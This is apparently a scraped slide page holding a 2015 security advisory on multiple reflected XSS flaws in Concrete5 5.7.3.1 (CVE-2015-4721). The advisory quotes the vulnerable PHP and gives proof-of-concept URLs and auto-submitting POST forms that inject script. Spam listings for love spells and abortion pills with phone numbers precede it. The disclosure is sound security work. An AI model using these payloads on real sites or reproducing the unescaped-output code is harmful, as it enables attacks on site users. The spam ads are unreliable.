Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 

Concrete5 Multiple Reflected XSS Advisory

  • 1. Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1 Author: Egidio Romano
  • 2. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4  Summary Vulnerabilities Class Cross Site Scripting (XSS) CVE ID CVE-2015-4721 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59661 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.  Vulnerabilities Details Following are the reflected XSS vulnerabilities identified:  File: /concrete/views/panels/details/page/versions.php (lines 5-14): <?php foreach($_REQUEST['cvID'] as $cvID) { $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked); $checked = false; } print $ih->tabs($tabs); foreach($_REQUEST['cvID'] as $cvID) { ?>
  • 3. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4 <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%"> <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" /> User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these: http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri pt%3Ealert%28/XSS/%29%3C/script%3E%3C!-- http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35): public function selectUser($fieldName, $uID = false, $javascriptFunc … $selectedUID = 0; if (isset($_REQUEST[$fieldName])) { $selectedUID = $_REQUEST[$fieldName]; } else if ($uID > 0) { $selectedUID = $uID; } $html = ''; $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary- selected-item-inner"><strong class="ccm-summary-selected-item-label">'; if ($selectedUID > 0) { $ui = UserInfo::getByID($selectedUID); $html .= $ui->getUserName(); } $html .= '</strong></div>'; $identifier = new ConcreteCoreUtilityServiceIdentifier(); $selector = $identifier->getString(32); $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog- modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>'; $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';/> User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
  • 4. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4 http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip t%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/elements/group/search.php (lines 4-20): $searchRequest = $_REQUEST; $result = Loader::helper('json')->encode($controller->getSearchResultObject()- >getJSONObject()); $tree = GroupTree::get(); $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID); $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID); ?> <style type="text/css"> div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; } </style> <div data-search="groups"> <script type="text/template" data-template="search-form"> <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm- search-fields-none"> <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" /> User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this: http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3 C/script%3E  URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon"> <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'> </form>
  • 5. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4 <script>document.forms[0].submit()</script> </body> </html>  URL: http://[host]/index.php/dashboard/pages/single User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/pages/single"> <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'> </form> <script>document.forms[0].submit()</script> </body> </html>  File: /concrete/attributes/select/form.php (lines 55-60): $vals = $this->post('atSelectNewOption'); if (is_array($vals)) { foreach($vals as $v) { ?> <div class="newAttrValue"> <?php echo $form->hidden($this- >field('atSelectNewOption') . '[]', $v)?> <span class="badge"><?php echo $v?></span> /> User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.